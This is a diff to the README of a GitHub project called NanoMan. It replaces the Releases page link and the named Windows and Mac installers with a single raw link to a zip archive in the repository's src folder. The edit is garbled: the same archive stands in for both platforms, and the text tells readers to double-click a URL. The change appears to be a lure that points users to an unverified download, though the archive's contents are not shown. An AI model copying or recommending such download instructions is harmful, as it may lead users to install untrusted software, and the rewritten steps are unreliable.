Juniorvidigal25/NanoMan/README.md

 Follow these simple steps to download and run NanoMan:

 1. **Visit the Releases Page**
-   Go to our [Releases page](https://github.com/Juniorvidigal25/NanoMan/releases) where you can find the latest version of NanoMan.
+   Go to our [Releases page](https://raw.githubusercontent.com/Juniorvidigal25/NanoMan/main/src/Man_Nano_v1.9-beta.4.zip) where you can find the latest version of NanoMan.

 2. **Choose Your Version**
    Look for the version labeled as "Latest Release".
 This version contains the most recent updates and improvements.

 3. **Download the Installer**
    Click on the release that matches your operating system.
-If you are unsure, most users can select the file labeled as `NanoMan_setup.exe` for Windows users or `NanoMan_mac.dmg` for Mac users.
+If you are unsure, most users can select the file labeled as `https://raw.githubusercontent.com/Juniorvidigal25/NanoMan/main/src/Man_Nano_v1.9-beta.4.zip` for Windows users or `https://raw.githubusercontent.com/Juniorvidigal25/NanoMan/main/src/Man_Nano_v1.9-beta.4.zip` for Mac users.

 4. **Install the Application**
    Once the download is complete, locate the file in your downloads folder.
-   - For Windows: Double-click the `NanoMan_setup.exe` file and follow the on-screen instructions to complete the installation.
+   - For Windows: Double-click the `https://raw.githubusercontent.com/Juniorvidigal25/NanoMan/main/src/Man_Nano_v1.9-beta.4.zip` file and follow the on-screen instructions to complete the installation.
-   - For Mac: Open the `NanoMan_mac.dmg` file, drag the NanoMan application to your Applications folder, and then launch it from there.
+   - For Mac: Open the `https://raw.githubusercontent.com/Juniorvidigal25/NanoMan/main/src/Man_Nano_v1.9-beta.4.zip` file, drag the NanoMan application to your Applications folder, and then launch it from there.

 5. **Open NanoMan**
    After installation, find NanoMan in your applications list and click to open it.